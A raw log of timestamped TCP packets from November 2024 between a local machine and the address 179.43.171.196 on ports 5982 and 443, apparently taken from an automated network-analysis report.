                                                                                                                                                              Nov 21, 2024 11:27:39.478715897 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.478756905 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.485312939 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.506889105 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.506963015 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.507018089 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.509434938 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.509519100 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.509635925 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.514659882 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.514746904 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.514771938 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.519838095 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.519897938 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.519932985 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.524947882 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.525044918 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.525057077 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.529956102 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.530026913 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.530050039 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.534683943 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.534733057 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.534785986 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.539366007 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.539402008 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.539441109 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.543834925 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.543951035 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.544024944 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.548275948 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.548362017 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.548382044 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.552560091 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.552664042 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.552680969 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.557024002 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.557090998 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.557137012 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.560964108 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.561029911 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.561052084 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.565049887 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.565104008 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.565141916 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.569173098 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.569224119 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.569319010 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.573174953 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.573232889 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.573245049 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.577130079 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.577188969 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.577192068 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.581108093 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.581172943 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.581202030 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.583771944 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.583837032 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.584105968 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.586314917 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.586371899 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.586447954 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.588557005 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.588610888 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.588746071 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.591546059 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.591594934 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.591620922 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.593497038 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.593547106 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.593720913 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.595812082 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.595861912 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.596112013 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.598237991 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.598313093 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.598361015 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.600801945 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.600881100 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.601155996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.603060007 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.603116035 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.603141069 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.605479956 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.605531931 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.605622053 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.607882977 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.607930899 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.607971907 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.610404968 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.610467911 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.610527039 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.612656116 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.612709999 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.612772942 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.615041971 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.615111113 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.615175009 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.617523909 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.617579937 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.617594957 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.619867086 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.619924068 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.620022058 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.622257948 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.622313023 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.622339964 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.624708891 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.624771118 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.624877930 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.627060890 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.627132893 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.627173901 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.629439116 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.629491091 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.629492998 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.631822109 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.631885052 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.631903887 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.634242058 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.634305954 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.634337902 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.636691093 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.636761904 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.636784077 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.638972998 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.639050007 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.639070988 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.641371012 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.641449928 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.641483068 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.643712997 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.643824100 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.698503017 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.698616028 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.698677063 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.699520111 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.700040102 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.700107098 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.700185061 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.702054977 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.702111006 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:39.702155113 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:39.751215935 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:41.960077047 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.079591036 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.079807997 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.199246883 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.515121937 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.515258074 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.515328884 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.515386105 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.516048908 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.516119003 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.516304016 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.516412020 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.516469002 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.517385006 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.517398119 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.517477036 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.518150091 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.518383980 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.518445969 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.519191980 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.519355059 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.519422054 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.519474030 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.520463943 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.520528078 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.520584106 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.521532059 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.521599054 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.521960974 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.522059917 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.522114992 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.523046970 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.523163080 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.523226976 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.524092913 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.524508953 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.524568081 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.524571896 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.525598049 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.525674105 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.525686026 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.526684046 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.526750088 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.526777029 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.527864933 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.527939081 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.527942896 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.528845072 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.528904915 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.528959990 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.529972076 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.530039072 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.530101061 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.531016111 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.531076908 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.531132936 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.532085896 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.532140970 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.532187939 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.533212900 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.533278942 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.533333063 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.534265995 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.534320116 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.534365892 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.535343885 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.535414934 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.535432100 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.536415100 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.536454916 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.536550045 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.537501097 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.537538052 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.537621975 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.538655043 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.538701057 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.538789988 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.539673090 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.539714098 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.539757013 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.540796995 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.540842056 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.540870905 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.541855097 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.541901112 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.542045116 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.542943001 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.542985916 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.543030977 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.544032097 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.544071913 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.544107914 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.545106888 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.545150995 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.545205116 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.546201944 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.546278000 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.546295881 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.547283888 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.547342062 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.547369003 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.548460960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.548475027 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.548548937 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.549452066 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.549525023 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.549582005 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.550523996 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.550584078 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.550637960 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.551672935 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.551733017 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.551825047 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.552710056 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.552778006 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.552813053 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.553900957 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.553962946 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.553976059 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.555278063 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.555358887 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.555422068 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.556684017 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.556761980 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.669018030 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.788713932 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.788836956 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.908555031 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.937489986 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.937530041 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:42.937686920 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.937686920 CET49740443192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:42.937721968 CET44349740179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.226027966 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.226094007 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.226264954 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.226294994 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.227400064 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.227463007 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.227607012 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.227689981 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.227780104 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.228540897 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.228594065 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.228648901 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.229054928 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.229172945 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.229227066 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.230180979 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.230329037 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.230384111 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.230386019 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.231447935 CET598249739179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:43.231499910 CET497395982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:43.231718063 CET598249739179.43.171.196192.168.2.9
